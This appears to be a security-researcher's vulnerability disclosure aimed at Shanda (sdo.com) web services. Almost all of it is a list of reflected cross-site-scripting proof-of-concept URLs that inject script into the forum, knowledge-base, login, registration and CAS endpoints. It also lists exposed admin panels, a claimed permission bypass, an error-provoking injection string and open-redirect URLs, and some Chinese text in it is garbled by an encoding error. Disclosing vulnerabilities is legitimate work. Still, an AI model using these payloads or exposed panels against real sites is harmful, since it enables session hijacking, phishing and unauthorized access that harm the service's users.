http://cy.sdo.com/bbs/member.php?action=lostpasswd&formhash=ba4a947f&referer=%22%3E%3Cscript%3Ealert%286380139%29%3B%3C/script%3E&cookietime=2592000
http://cy.sdo.com/bbs/2fly_gift.php?formhash=ba4a947f&referer=%22%3E%3Cscript%3Ealert%282847615%29%3B%3C/script%3E&cookietime=2592000
http://cy.sdo.com/bbs/forumdisplay.php?fid=24&formhash=ba4a947f&referer=%22%3E%3Cscript%3Ealert%282950003%29%3B%3C/script%3E&cookietime=2592000
http://ws.abc.sdo.com/knowledge/ClassShow/13045?queryString='"><script>alert(0513467);</script><"&idx=13045
http://ws.abc.sdo.com/knowledge/ClassShow/13046?queryString='"><script>alert(3721571);</script><"&idx=13046
http://ws.abc.sdo.com/knowledge/ClassShow/13047?queryString='"><script>alert(0426668);</script><"&idx=13047
http://ws.abc.sdo.com/knowledge/ClassShow/13048?queryString='"><script>alert(2149265);</script><"&idx=13048
http://ws.abc.sdo.com/knowledge/ClassShow/13045?queryString=1&idx='"><script>alert(2149265);</script><"
http://ws.abc.sdo.com/knowledge/ClassShow/13049?queryString='"><script>alert(5355054);</script><"&idx=13049
http://ws.abc.sdo.com/knowledge/ClassShow/13047?queryString=1&idx='"><script>alert(8551854);</script><"
http://ws.abc.sdo.com/knowledge/ClassShow/13046?queryString=1&idx='"><script>alert(4964253);</script><"
http://ws.abc.sdo.com/knowledge/ClassShow/13048?queryString=1&idx='"><script>alert(4964253);</script><"
http://ws.abc.sdo.com/knowledge/ClassShow/13049?queryString=1&idx='"><script>alert(7809430);</script><"
http://ws.abc.sdo.com/knowledge/ClassShow/13063?queryString='"><script>alert(0876530);</script><"&idx=13063
http://ws.abc.sdo.com/knowledge/ClassShow/13064?queryString='"><script>alert(3393352);</script><"&idx=13064
http://ws.abc.sdo.com/knowledge/ClassShow/13068?queryString='"><script>alert(9668415);</script><"&idx=13068
http://ws.abc.sdo.com/knowledge/ClassShow/13070?queryString='"><script>alert(1802440);</script><"&idx=13070
http://ws.abc.sdo.com/knowledge/ClassShow/13063?queryString=1&idx='"><script>alert(1802440);</script><"
http://ws.abc.sdo.com/knowledge/ClassShow/13064?queryString=1&idx='"><script>alert(5912402);</script><"
http://ws.abc.sdo.com/knowledge/ClassShow/13072?queryString='"><script>alert(5912402);</script><"&idx=13072
http://ws.abc.sdo.com/knowledge/ClassShow/13067?queryString='"><script>alert(7535048);</script><"&idx=13067
http://ws.abc.sdo.com/knowledge/ClassShow/13071?queryString='"><script>alert(2957539);</script><"&idx=13071
http://ws.abc.sdo.com/knowledge/ClassShow/13068?queryString=1&idx='"><script>alert(6642383);</script><"
http://ws.abc.sdo.com/knowledge/ClassShow/13072?queryString=1&idx='"><script>alert(1376727);</script><"
http://ws.abc.sdo.com/knowledge/ClassShow/13089?queryString='"><script>alert(4583426);</script><"&idx=13089
http://ws.abc.sdo.com/knowledge/ClassShow/13067?queryString=1&idx='"><script>alert(4583426);</script><"
http://ws.abc.sdo.com/knowledge/ClassShow/13093?queryString='"><script>alert(4583426);</script><"&idx=13093
http://ws.abc.sdo.com/knowledge/ClassShow/13091?queryString='"><script>alert(4583426);</script><"&idx=13091
http://ws.abc.sdo.com/knowledge/ClassShow/13071?queryString=1&idx='"><script>alert(4583426);</script><"
http://ws.abc.sdo.com/knowledge/ClassShow/13092?queryString='"><script>alert(0869258);</script><"&idx=13092
http://ws.abc.sdo.com/knowledge/ClassShow/13088?queryString='"><script>alert(3252579);</script><"&idx=13088
http://ws.abc.sdo.com/knowledge/ClassShow/13094?queryString='"><script>alert(3252579);</script><"&idx=13094
http://ws.abc.sdo.com/knowledge/ClassShow/13090?queryString='"><script>alert(3252579);</script><"&idx=13090
http://ws.abc.sdo.com/knowledge/ClassShow/13089?queryString=1&idx='"><script>alert(3059254);</script><"
http://ws.abc.sdo.com/knowledge/ClassShow/13091?queryString=1&idx='"><script>alert(3059254);</script><"
http://ws.abc.sdo.com/knowledge/ClassShow/13093?queryString=1&idx='"><script>alert(3059254);</script><"
http://ws.abc.sdo.com/knowledge/ClassShow/13095?queryString='"><script>alert(2412714);</script><"&idx=13095
http://ws.abc.sdo.com/knowledge/ClassShow/13092?queryString=1&idx='"><script>alert(2412714);</script><"
http://ws.abc.sdo.com/knowledge/ClassShow/13088?queryString=1&idx='"><script>alert(5618414);</script><"
http://ws.abc.sdo.com/knowledge/ClassShow/13090?queryString=1&idx='"><script>alert(5618414);</script><"
http://ws.abc.sdo.com/knowledge/ClassShow/13094?queryString=1&idx='"><script>alert(9834013);</script><"
http://ws.abc.sdo.com/knowledge/ClassShow/13085?queryString='"><script>alert(1940913);</script><"&idx=13085
http://ws.abc.sdo.com/knowledge/ClassShow/13087?queryString='"><script>alert(4148512);</script><"&idx=13087
http://ws.abc.sdo.com/knowledge/ClassShow/13070?queryString=1&idx='"><script>alert(4148512);</script><"
http://ws.abc.sdo.com/knowledge/ClassShow/13095?queryString=1&idx='"><script>alert(7253211);</script><"
http://ws.abc.sdo.com/knowledge/ClassShow/13082?queryString='"><script>alert(7253211);</script><"&idx=13082
http://ws.abc.sdo.com/knowledge/ClassShow/13080?queryString='"><script>alert(7253211);</script><"&idx=13080
http://ws.abc.sdo.com/knowledge/ClassShow/13078?queryString='"><script>alert(3677700);</script><"&idx=13078
http://ws.abc.sdo.com/knowledge/ClassShow/13083?queryString='"><script>alert(3677700);</script><"&idx=13083
http://ws.abc.sdo.com/knowledge/ClassShow/13079?queryString='"><script>alert(6772400);</script><"&idx=13079
http://ws.abc.sdo.com/knowledge/ClassShow/13085?queryString=1&idx='"><script>alert(6772400);</script><"
http://ws.abc.sdo.com/knowledge/ClassShow/13087?queryString=1&idx='"><script>alert(6772400);</script><"
http://ws.abc.sdo.com/knowledge/ClassShow/13075?queryString='"><script>alert(9989100);</script><"&idx=13075
http://ws.abc.sdo.com/knowledge/ClassShow/13076?queryString='"><script>alert(9989100);</script><"&idx=13076
http://ws.abc.sdo.com/knowledge/ClassShow/13082?queryString=1&idx='"><script>alert(2086900);</script><"
http://ws.abc.sdo.com/knowledge/ClassShow/13080?queryString=1&idx='"><script>alert(2086900);</script><"
http://ws.abc.sdo.com/knowledge/ClassShow/13078?queryString=1&idx='"><script>alert(8398393);</script><"
http://ws.abc.sdo.com/knowledge/ClassShow/12545?queryString='"><script>alert(8398393);</script><"&idx=12545
http://ws.abc.sdo.com/knowledge/ClassShow/13076?queryString=1&idx='"><script>alert(0505096);</script><"
http://ws.abc.sdo.com/knowledge/ClassShow/13075?queryString=1&idx='"><script>alert(0505096);</script><"
http://ws.abc.sdo.com/knowledge/ClassShow/12548?queryString='"><script>alert(4711708);</script><"&idx=12548
http://ws.abc.sdo.com/knowledge/ClassShow/13077?queryString='"><script>alert(5192521);</script><"&idx=13077
http://ws.abc.sdo.com/knowledge/ClassShow/12554?queryString='"><script>alert(7818584);</script><"&idx=12554
http://ws.abc.sdo.com/knowledge/ClassShow/12545?queryString=1&idx='"><script>alert(2417275);</script><"
http://ws.abc.sdo.com/knowledge/ClassShow/12549?queryString='"><script>alert(2417275);</script><"&idx=12549
http://ws.abc.sdo.com/knowledge/ClassShow/13079?queryString=1&idx='"><script>alert(6237560);</script><"
http://ws.abc.sdo.com/knowledge/ClassShow/13083?queryString=1&idx='"><script>alert(9544396);</script><"
http://ws.abc.sdo.com/knowledge/ClassShow/12555?queryString='"><script>alert(1659680);</script><"&idx=12555
http://ws.abc.sdo.com/knowledge/ClassShow/13077?queryString=1&idx='"><script>alert(1659680);</script><"
http://ws.abc.sdo.com/knowledge/ClassShow/12554?queryString=1&idx='"><script>alert(8625956);</script><"
http://ws.abc.sdo.com/knowledge/ClassShow/12548?queryString=1&idx='"><script>alert(8625956);</script><"
http://ws.abc.sdo.com/knowledge/ClassShow/13074?queryString='"><script>alert(8625956);</script><"&idx=13074
http://ws.abc.sdo.com/knowledge/ClassShow/12556?queryString='"><script>alert(0069195);</script><"&idx=12556
http://ws.abc.sdo.com/knowledge/ClassShow/13052?queryString='"><script>alert(7391693);</script><"&idx=13052
http://ws.abc.sdo.com/knowledge/ClassShow/13058?queryString='"><script>alert(6993830);</script><"&idx=13058
http://ws.abc.sdo.com/knowledge/ClassShow/13074?queryString=1&idx='"><script>alert(2748299);</script><"
http://ws.abc.sdo.com/knowledge/ClassShow/13056?queryString='"><script>alert(5808828);</script><"&idx=13056
http://ws.abc.sdo.com/knowledge/ClassShow/13055?queryString='"><script>alert(5808828);</script><"&idx=13055
http://ws.abc.sdo.com/knowledge/ClassShow/13052?queryString=1&idx='"><script>alert(9008591);</script><"
http://ws.abc.sdo.com/knowledge/ClassShow/13057?queryString='"><script>alert(9008591);</script><"&idx=13057
http://ws.abc.sdo.com/knowledge/ClassShow/13060?queryString='"><script>alert(9008591);</script><"&idx=13060
http://ws.abc.sdo.com/knowledge/ClassShow/13061?queryString='"><script>alert(1104182);</script><"&idx=13061
http://ws.abc.sdo.com/knowledge/ClassShow/13058?queryString=1&idx='"><script>alert(4328142);</script><"
http://ws.abc.sdo.com/knowledge/ClassShow/13062?queryString='"><script>alert(4328142);</script><"&idx=13062
http://ws.abc.sdo.com/knowledge/ClassShow/12556?queryString=1&idx='"><script>alert(4328142);</script><"
http://ws.abc.sdo.com/knowledge/ClassShow/12555?queryString=1&idx='"><script>alert(8527681);</script><"
http://ws.abc.sdo.com/knowledge/ClassShow/13056?queryString=1&idx='"><script>alert(0633370);</script><"
http://ws.abc.sdo.com/edit/index/27699001?referenceName[]='"><script>alert(0633370);</script><"&referenceUrl[]=&hidTitle=銆愮嫭瀹躲€戝僵铏圭綉鍒嗕韩鍐呭璧㈠鍔�&hidClassID=20023&hidOriginalClassID=20023&hidKnowLedgeType=1&hidReference=&originalReferenceMedia=
http://ws.abc.sdo.com/knowledge/ClassShow/13055?queryString=1&idx='"><script>alert(0633370);</script><"
http://ws.abc.sdo.com/knowledge/ClassShow/13061?queryString=1&idx='"><script>alert(3831715);</script><"
http://ws.abc.sdo.com/knowledge/ClassShow/13057?queryString=1&idx='"><script>alert(3831715);</script><"
http://ws.abc.sdo.com/knowledge/ClassShow/13060?queryString=1&idx='"><script>alert(3831715);</script><"
http://ws.abc.sdo.com/knowledge/ClassShow/12549?queryString=1&idx='"><script>alert(4328142);</script><"
http://ws.abc.sdo.com/knowledge/ClassShow/13059?queryString='"><script>alert(6468769);</script><"&idx=13059
http://ws.abc.sdo.com/edit/index/27699001?referenceName[]=&referenceUrl[]='"><script>alert(5475785);</script><"&hidTitle=銆愮嫭瀹躲€戝僵铏圭綉鍒嗕韩鍐呭璧㈠鍔�&hidClassID=20023&hidOriginalClassID=20023&hidKnowLedgeType=1&hidReference=&originalReferenceMedia=
http://ws.abc.sdo.com/knowledge/ClassShow/13062?queryString=1&idx='"><script>alert(1788377);</script><"
http://ws.abc.sdo.com/edit/index/27699001?referenceName[]=&referenceUrl[]=&hidTitle='"><script>alert(1756743);</script><"&hidOriginalClassID=20023&hidKnowLedgeType=1&hidReference=&originalReferenceMedia=
http://ws.abc.sdo.com/knowledge/ClassShow/13059?queryString=1&idx='"><script>alert(8671678);</script><"
http://ws.abc.sdo.com/edit/index/27699001?referenceName[]=&referenceUrl[]=&hidTitle=銆愮嫭瀹躲€戝僵铏圭綉鍒嗕韩鍐呭璧㈠鍔�&hidClassID=20023&hidOriginalClassID='"><script>alert(1922464);</script><"&hidKnowLedgeType=1&hidReference=&originalReferenceMedia=
http://2c.abc.sdo.com/knowledge/ClassShow/11997?queryString='"><script>alert(0341653);</script><"&idx=11997
http://2c.abc.sdo.com/knowledge/ClassShow/11997?queryString=1&idx='"><script>alert(7655439);</script><"
http://ws.abc.sdo.com/edit/index/27699001?referenceName[]=&referenceUrl[]=&hidTitle=銆愮嫭瀹躲€戝僵铏圭綉鍒嗕韩鍐呭璧㈠鍔�&hidClassID=20023&hidOriginalClassID=20023&hidKnowLedgeType='"><script>alert(7655439);</script><"&hidReference=&originalReferenceMedia=
http://2c.abc.sdo.com/knowledge/ClassShow/12000?queryString='"><script>alert(9616427);</script><"&idx=12000
http://2c.abc.sdo.com/knowledge/ClassShow/12000?queryString=1&idx='"><script>alert(8834649);</script><"
http://ws.abc.sdo.com/edit/index/27699001?referenceName[]=&referenceUrl[]=&hidTitle=銆愮嫭瀹躲€戝僵铏圭綉鍒嗕韩鍐呭璧㈠鍔�&hidClassID=20023&hidOriginalClassID=20023&hidKnowLedgeType=1&hidReference=';</script><script>alert(3012439);</script>&originalReferenceMedia=
http://ws.abc.sdo.com/edit/index/27699001?referenceName[]=&referenceUrl[]=&hidTitle=銆愮嫭瀹躲€戝僵铏圭綉鍒嗕韩鍐呭璧㈠鍔�&hidClassID=20023&hidOriginalClassID=20023&hidKnowLedgeType=1&hidReference=&originalReferenceMedia=';</script><script>alert(7373225);</script>
http://gui.sdo.com/admin/
http://kk.sdo.com/admin/
http://cy.sdo.com/200909/admin/ 这个我知道你们下线了，但是迟迟不把他下线，所以还是发出来！
还有上传页面比较多，我就不一一去看了。
http://in.sdo.com/wp-login.php  盛大创新学院
http://image.help.sdo.com/index.php 图片管理系统
http://icamp.sdo.com/manage/  权限绕过。嘎嘎
报错
http://bb.sdo.com/search.aspx?categoryid=%27%22%27%22%29%3b%7c%5d*%7b%250d%250a%3C%2500%3E&categoryname=%E8%89%BA%E6%9C%AF&page=4&searchtype=ebook
url跳转
http://sndasdopassport.sdo.com/sdodownload/passport/SNDAHomepage/SNDANavigator.aspx?From=1000Y.SDO.COM&Panel=HOME_NEWSBAR&To=http://www.wooyun.org

http://txz.sdo.com/ssologin.aspx?a=a&CasBackUrl=http://wooyun.org

漏洞证明：

http://login.sdo.com/sdo/Login/LoginFrameFC.php?appId=207&areaId=1&loginifrmId=iframeLogin&proxyUrl=http://www.sdo.com/proxy.html&returnURL=http://iq.sdo.com&backUrl=http://iq.sdo.com&CSSURL=http://iq.sdo.com/Style/IframeLogin.css&username=&password=&templateId='"><script>alert(2037769);</script><"&sdid=&infoEx=&uid=&appArea=1&service=http://iq.sdo.com&code=2&pageType=0&autoLogin=0&saveTime=14&loginCustomerUrl=http://login.sdo.com/sdo/Login/LoginSDO.php?service=http://iq.sdo.com&encryptFlag=0
http://login.sdo.com/sdo/Login/LoginFrameFC.php?appId=207&areaId=1&loginifrmId=iframeLogin&proxyUrl=http://www.sdo.com/proxy.html&returnURL=http://iq.sdo.com&backUrl=http://iq.sdo.com&CSSURL=http://iq.sdo.com/Style/IframeLogin.css&username=&password=&templateId=&sdid='"><script>alert(5144459);</script><"&infoEx=&uid=&appArea=1&service=http://iq.sdo.com&code=2&pageType=0&autoLogin=0&saveTime=14&loginCustomerUrl=http://login.sdo.com/sdo/Login/LoginSDO.php?service=http://iq.sdo.com&encryptFlag=0
http://login.sdo.com/sdo/Login/LoginFrameFC.php?appId=207&areaId=1&loginifrmId=iframeLogin&proxyUrl=http://www.sdo.com/proxy.html&returnURL=http://iq.sdo.com&backUrl=http://iq.sdo.com&CSSURL=http://iq.sdo.com/Style/IframeLogin.css&username=&password=&templateId=&sdid=&infoEx='"><script>alert(1556958);</script><"&uid=&appArea=1&service=http://iq.sdo.com&code=2&pageType=0&autoLogin=0&saveTime=14&loginCustomerUrl=http://login.sdo.com/sdo/Login/LoginSDO.php?service=http://iq.sdo.com&encryptFlag=0
http://login.sdo.com/sdo/Login/LoginFrameFC.php?appId=207&areaId=1&loginifrmId=iframeLogin&proxyUrl=http://www.sdo.com/proxy.html&returnURL=http://iq.sdo.com&backUrl=http://iq.sdo.com&CSSURL=http://iq.sdo.com/Style/IframeLogin.css&username=&password=&templateId=&sdid=&infoEx=&uid='"><script>alert(4662558);</script><"&appArea=1&service=http://iq.sdo.com&code=2&pageType=0&autoLogin=0&saveTime=14&loginCustomerUrl=http://login.sdo.com/sdo/Login/LoginSDO.php?service=http://iq.sdo.com&encryptFlag=0
http://login.sdo.com/sdo/Login/LoginFrameFC.php?appId=207&areaId=1&loginifrmId=iframeLogin&proxyUrl=http://www.sdo.com/proxy.html&returnURL=http://iq.sdo.com&backUrl=http://iq.sdo.com&CSSURL=http://iq.sdo.com/Style/IframeLogin.css&username=&password=&templateId=&sdid=&infoEx=&uid=&appArea=1&service=http://iq.sdo.com&code=2&pageType='"><script>alert(4127734);</script><"&autoLogin=0&saveTime=14&loginCustomerUrl=http://login.sdo.com/sdo/Login/LoginSDO.php?service=http://iq.sdo.com&encryptFlag=0
http://app.help.sdo.com/sdohelp.ashx?gameid=200012500&area=4000&type=3&maxlen=10&maxnum=4&src='"><script>alert(9968761);</script><"&ver=0
http://register.sdo.com/gaea/phone_default.aspx?from=121&zone='"><script>alert(6504626);</script><"
http://register.sdo.com/gaea/phone_default.aspx?from=121&zone=nav&ptType='"><script>alert(8684335);</script><"®sdid=&chksdid=false&hidRecName001=&hidRecName002=&hidRecRule001=&hidRecRule002=&agent4IpCheck=checkIp&txtRegisterFrom=121&txtRegisterZone=nav&sessionid=&goldtype=&partner=&apptype=&agent=&ctype=&hidExinfo=&qqaccount=&attcode2=123456&showPTInfoSection=&vendorPhoneId=&modelPhoneId=
http://register.sdo.com/gaea/phone_default.aspx?from=121&zone=nav&ptType=2®sdid='"><script>alert(5536731);</script><"&chksdid=false&hidRecName001=&hidRecName002=&hidRecRule001=&hidRecRule002=&agent4IpCheck=checkIp&txtRegisterFrom=121&txtRegisterZone=nav&sessionid=&goldtype=&partner=&apptype=&agent=&ctype=&hidExinfo=&qqaccount=&attcode2=123456&showPTInfoSection=&vendorPhoneId=&modelPhoneId=
http://cy.sdo.com/bbs/?formhash=ba4a947f&referer=%22%3E%3Cscript%3Ealert%287161522%29%3B%3C/script%3E&cookietime=2592000
http://register.sdo.com/gaea/phone_default.aspx?from=121&zone=nav&ptType=2®sdid=&chksdid='"><script>alert(8207517);</script><"&hidRecName001=&hidRecName002=&hidRecRule001=&hidRecRule002=&agent4IpCheck=checkIp&txtRegisterFrom=121&txtRegisterZone=nav&sessionid=&goldtype=&partner=&apptype=&agent=&ctype=&hidExinfo=&qqaccount=&attcode2=123456&showPTInfoSection=&vendorPhoneId=&modelPhoneId=
http://register.sdo.com/gaea/phone_default.aspx?from=121&zone=nav&ptType=2®sdid=&chksdid=false&hidRecName001='"><script>alert(7736705);</script><"&hidRecName002=&hidRecRule001=&hidRecRule002=&agent4IpCheck=checkIp&txtRegisterFrom=121&txtRegisterZone=nav&sessionid=&goldtype=&partner=&apptype=&agent=&ctype=&hidExinfo=&qqaccount=&attcode2=123456&showPTInfoSection=&vendorPhoneId=&modelPhoneId=
http://register.sdo.com/gaea/phone_default.aspx?from=121&zone=nav&ptType=2®sdid=&chksdid=false&hidRecName001=&hidRecName002='"><script>alert(5674032);</script><"&hidRecRule001=&hidRecRule002=&agent4IpCheck=checkIp&txtRegisterFrom=121&txtRegisterZone=nav&sessionid=&goldtype=&partner=&apptype=&agent=&ctype=&hidExinfo=&qqaccount=&attcode2=123456&showPTInfoSection=&vendorPhoneId=&modelPhoneId=
http://register.sdo.com/gaea/phone_default.aspx?from=121&zone=nav&ptType=2®sdid=&chksdid=false&hidRecName001=&hidRecName002=&hidRecRule001='"><script>alert(1022590);</script><"&hidRecRule002=&agent4IpCheck=checkIp&txtRegisterFrom=121&txtRegisterZone=nav&sessionid=&goldtype=&partner=&apptype=&agent=&ctype=&hidExinfo=&qqaccount=&attcode2=123456&showPTInfoSection=&vendorPhoneId=&modelPhoneId=
http://register.sdo.com/gaea/phone_default.aspx?from=121&zone=nav&ptType=2®sdid=&chksdid=false&hidRecName001=&hidRecName002=&hidRecRule001=&hidRecRule002='"><script>alert(0541698);</script><"&agent4IpCheck=checkIp&txtRegisterFrom=121&txtRegisterZone=nav&sessionid=&goldtype=&partner=&apptype=&agent=&ctype=&hidExinfo=&qqaccount=&attcode2=123456&showPTInfoSection=&vendorPhoneId=&modelPhoneId=
http://register.sdo.com/gaea/phone_default.aspx?from=121&zone=nav&ptType=2®sdid=&chksdid=false&hidRecName001=&hidRecName002=&hidRecRule001=&hidRecRule002=&agent4IpCheck='"><script>alert(5374185);</script><"&txtRegisterFrom=121&txtRegisterZone=nav&sessionid=&goldtype=&partner=&apptype=&agent=&ctype=&hidExinfo=&qqaccount=&attcode2=123456&showPTInfoSection=&vendorPhoneId=&modelPhoneId=
http://register.sdo.com/gaea/phone_default.aspx?from=121&zone=nav&ptType=2®sdid=&chksdid=false&hidRecName001=&hidRecName002=&hidRecRule001=&hidRecRule002=&agent4IpCheck=checkIp&txtRegisterFrom='"><script>alert(3302573);</script><"&txtRegisterZone=nav&sessionid=&goldtype=&partner=&apptype=&agent=&ctype=&hidExinfo=&qqaccount=&attcode2=123456&showPTInfoSection=&vendorPhoneId=&modelPhoneId=
http://register.sdo.com/gaea/phone_default.aspx?from=121&zone=nav&ptType=2®sdid=&chksdid=false&hidRecName001=&hidRecName002=&hidRecRule001=&hidRecRule002=&agent4IpCheck=checkIp&txtRegisterFrom=121&txtRegisterZone='"><script>alert(0268717);</script><"&sessionid=&goldtype=&partner=&apptype=&agent=&ctype=&hidExinfo=&qqaccount=&attcode2=123456&showPTInfoSection=&vendorPhoneId=&modelPhoneId=
http://register.sdo.com/gaea/phone_default.aspx?from=121&zone=nav&ptType=2®sdid=&chksdid=false&hidRecName001=&hidRecName002=&hidRecRule001=&hidRecRule002=&agent4IpCheck=checkIp&txtRegisterFrom=121&txtRegisterZone=nav&sessionid='"><script>alert(9291599);</script><"&goldtype=&partner=&apptype=&agent=&ctype=&hidExinfo=&qqaccount=&attcode2=123456&showPTInfoSection=&vendorPhoneId=&modelPhoneId=
http://register.sdo.com/gaea/phone_default.aspx?from=121&zone=nav&ptType=2®sdid=&chksdid=false&hidRecName001=&hidRecName002=&hidRecRule001=&hidRecRule002=&agent4IpCheck=checkIp&txtRegisterFrom=121&txtRegisterZone=nav&sessionid=&goldtype='"><script>alert(4401657);</script><"&partner=&apptype=&agent=&ctype=&hidExinfo=&qqaccount=&attcode2=123456&showPTInfoSection=&vendorPhoneId=&modelPhoneId=
http://register.sdo.com/gaea/phone_default.aspx?from=121&zone=nav&ptType=2®sdid=&chksdid=false&hidRecName001=&hidRecName002=&hidRecRule001=&hidRecRule002=&agent4IpCheck=checkIp&txtRegisterFrom=121&txtRegisterZone=nav&sessionid=&goldtype=&partner='"><script>alert(3207573);</script><"&apptype=&agent=&ctype=&hidExinfo=&qqaccount=&attcode2=123456&showPTInfoSection=&vendorPhoneId=&modelPhoneId=
http://register.sdo.com/gaea/phone_default.aspx?from=121&zone=nav&ptType=2®sdid=&chksdid=false&hidRecName001=&hidRecName002=&hidRecRule001=&hidRecRule002=&agent4IpCheck=checkIp&txtRegisterFrom=121&txtRegisterZone=nav&sessionid=&goldtype=&partner=&apptype='"><script>alert(0399132);</script><"&agent=&ctype=&hidExinfo=&qqaccount=&attcode2=123456&showPTInfoSection=&vendorPhoneId=&modelPhoneId=
http://register.sdo.com/gaea/phone_default.aspx?from=121&zone=nav&ptType=2®sdid=&chksdid=false&hidRecName001=&hidRecName002=&hidRecRule001=&hidRecRule002=&agent4IpCheck=checkIp&txtRegisterFrom=121&txtRegisterZone=nav&sessionid=&goldtype=&partner=&apptype=&agent='"><script>alert(1523222);</script><"&ctype=&hidExinfo=&qqaccount=&attcode2=123456&showPTInfoSection=&vendorPhoneId=&modelPhoneId=
http://register.sdo.com/gaea/phone_default.aspx?from=121&zone=nav&ptType=2®sdid=&chksdid=false&hidRecName001=&hidRecName002=&hidRecRule001=&hidRecRule002=&agent4IpCheck=checkIp&txtRegisterFrom=121&txtRegisterZone=nav&sessionid=&goldtype=&partner=&apptype=&agent=&ctype='"><script>alert(3169019);</script><"&hidExinfo=&qqaccount=&attcode2=123456&showPTInfoSection=&vendorPhoneId=&modelPhoneId=
https://cas.sdo.com/cas/loginStateService?method='"><script>alert(5794917);</script><"
http://register.sdo.com/gaea/phone_default.aspx?from=121&zone=nav&ptType=2®sdid=&chksdid=false&hidRecName001=&hidRecName002=&hidRecRule001=&hidRecRule002=&agent4IpCheck=checkIp&txtRegisterFrom=121&txtRegisterZone=nav&sessionid=&goldtype=&partner=&apptype=&agent=&ctype=&hidExinfo='"><script>alert(4349020);</script><"&qqaccount=&attcode2=123456&showPTInfoSection=&vendorPhoneId=&modelPhoneId=
http://login.sdo.com/sdo/Login/LoginFrame.php?appDomain=tuita.com&appId='"><script>alert(6740555);</script><"&appArea=0&returnURL=http%3A%2F%2Fwww.tuita.com%2Flogin%3Frefer%3D&CSSURL=http%3A%2F%2Fwww.tuita.com%2Fhtml%2Flogin%2Fcss%2FIframeLogin.css%3F20150524184201&autologinchecked=1&autologintime=14&autologintext=%E4%B8%8B%E6%AC%A1%E8%87%AA%E5%8A%A8%E7%99%BB%E5%BD%95&autologinwaitingmsg=%E8%87%AA%E5%8A%A8%E7%99%BB%E5%BD%95%E4%B8%AD...&curURL=http%3A%2F%2Fwww.tuita.com%2Flogin%3Frefer%3D&usernamePlaceHolder=%E6%89%8B%E6%9C%BA%2F%E9%82%AE%E7%AE%B1%2F%E4%B8%AA%E6%80%A7%E5%8C%96%E5%B8%90%E5%8F%B7
http://register.sdo.com/gaea/phone_default.aspx?from=121&zone=nav&ptType=2®sdid=&chksdid=false&hidRecName001=&hidRecName002=&hidRecRule001=&hidRecRule002=&agent4IpCheck=checkIp&txtRegisterFrom=121&txtRegisterZone=nav&sessionid=&goldtype=&partner=&apptype=&agent=&ctype=&hidExinfo=&qqaccount='"><script>alert(1806599);</script><"&attcode2=123456&showPTInfoSection=&vendorPhoneId=&modelPhoneId=
http://login.sdo.com/sdo/Login/LoginFrame.php?appDomain=tuita.com&appId=256&appArea='"><script>alert(2257886);</script><"&returnURL=http%3A%2F%2Fwww.tuita.com%2Flogin%3Frefer%3D&CSSURL=http%3A%2F%2Fwww.tuita.com%2Fhtml%2Flogin%2Fcss%2FIframeLogin.css%3F20150524184201&autologinchecked=1&autologintime=14&autologintext=%E4%B8%8B%E6%AC%A1%E8%87%AA%E5%8A%A8%E7%99%BB%E5%BD%95&autologinwaitingmsg=%E8%87%AA%E5%8A%A8%E7%99%BB%E5%BD%95%E4%B8%AD...&curURL=http%3A%2F%2Fwww.tuita.com%2Flogin%3Frefer%3D&usernamePlaceHolder=%E6%89%8B%E6%9C%BA%2F%E9%82%AE%E7%AE%B1%2F%E4%B8%AA%E6%80%A7%E5%8C%96%E5%B8%90%E5%8F%B7
http://register.sdo.com/gaea/phone_default.aspx?from=121&zone=nav&ptType=2®sdid=&chksdid=false&hidRecName001=&hidRecName002=&hidRecRule001=&hidRecRule002=&agent4IpCheck=checkIp&txtRegisterFrom=121&txtRegisterZone=nav&sessionid=&goldtype=&partner=&apptype=&agent=&ctype=&hidExinfo=&qqaccount=&attcode2='"><script>alert(8264758);</script><"&showPTInfoSection=&vendorPhoneId=&modelPhoneId=
http://register.sdo.com/gaea/phone_default.aspx?from=121&zone=nav&ptType=2®sdid=&chksdid=false&hidRecName001=&hidRecName002=&hidRecRule001=&hidRecRule002=&agent4IpCheck=checkIp&txtRegisterFrom=121&txtRegisterZone=nav&sessionid=&goldtype=&partner=&apptype=&agent=&ctype=&hidExinfo=&qqaccount=&attcode2=123456&showPTInfoSection='"><script>alert(1415861);</script><"&vendorPhoneId=&modelPhoneId=
http://register.sdo.com/gaea/phone_default.aspx?from=121&zone=nav&ptType=2®sdid=&chksdid=false&hidRecName001=&hidRecName002=&hidRecRule001=&hidRecRule002=&agent4IpCheck=checkIp&txtRegisterFrom=121&txtRegisterZone=nav&sessionid=&goldtype=&partner=&apptype=&agent=&ctype=&hidExinfo=&qqaccount=&attcode2=123456&showPTInfoSection=&vendorPhoneId='"><script>alert(3646133);</script><"&modelPhoneId=
http://register.sdo.com/gaea/phone_default.aspx?from=121&zone=nav&ptType=2®sdid=&chksdid=false&hidRecName001=&hidRecName002=&hidRecRule001=&hidRecRule002=&agent4IpCheck=checkIp&txtRegisterFrom=121&txtRegisterZone=nav&sessionid=&goldtype=&partner=&apptype=&agent=&ctype=&hidExinfo=&qqaccount=&attcode2=123456&showPTInfoSection=&vendorPhoneId=&modelPhoneId='"><script>alert(7313563);</script><"
http://login.sdo.com/sdo/Login/LoginFrame.php?appDomain=tuita.com&appId=256&appArea=0&returnURL=http://www.tuita.com/login?refer=&CSSURL=http://www.tuita.com/html/login/css/IframeLogin.css?20150524184201&autologinchecked=1&autologintime=14&autologintext=涓嬫鑷姩鐧诲綍&autologinwaitingmsg=鑷姩鐧诲綍涓�...&curURL=http://www.tuita.com/login?refer=&usernamePlaceHolder=鎵嬫満/閭/涓€у寲甯愬彿&username=&password=&templateId='"><script>alert(5504003);</script><"&sdid=&infoEx=&uid=&service=http://www.tuita.com/login?refer=&code=2&pageType=0&autoLogin=&saveTime=14&loginCustomerUrl=http://www.tuita.com/login?refer=&encryptFlag=0
https://cas.sdo.com/cas/login?service='"><script>alert(1926402);</script><"&gateway=true
http://login.sdo.com/sdo/Login/LoginFrame.php?appDomain=tuita.com&appId=256&appArea=0&returnURL=http://www.tuita.com/login?refer=&CSSURL=http://www.tuita.com/html/login/css/IframeLogin.css?20150524184201&autologinchecked=1&autologintime=14&autologintext=涓嬫鑷姩鐧诲綍&autologinwaitingmsg=鑷姩鐧诲綍涓�...&curURL=http://www.tuita.com/login?refer=&usernamePlaceHolder=鎵嬫満/閭/涓€у寲甯愬彿&username=&password=&templateId=&sdid='"><script>alert(3542305);</script><"&infoEx=&uid=&service=http://www.tuita.com/login?refer=&code=2&pageType=0&autoLogin=&saveTime=14&loginCustomerUrl=http://www.tuita.com/login?refer=&encryptFlag=0
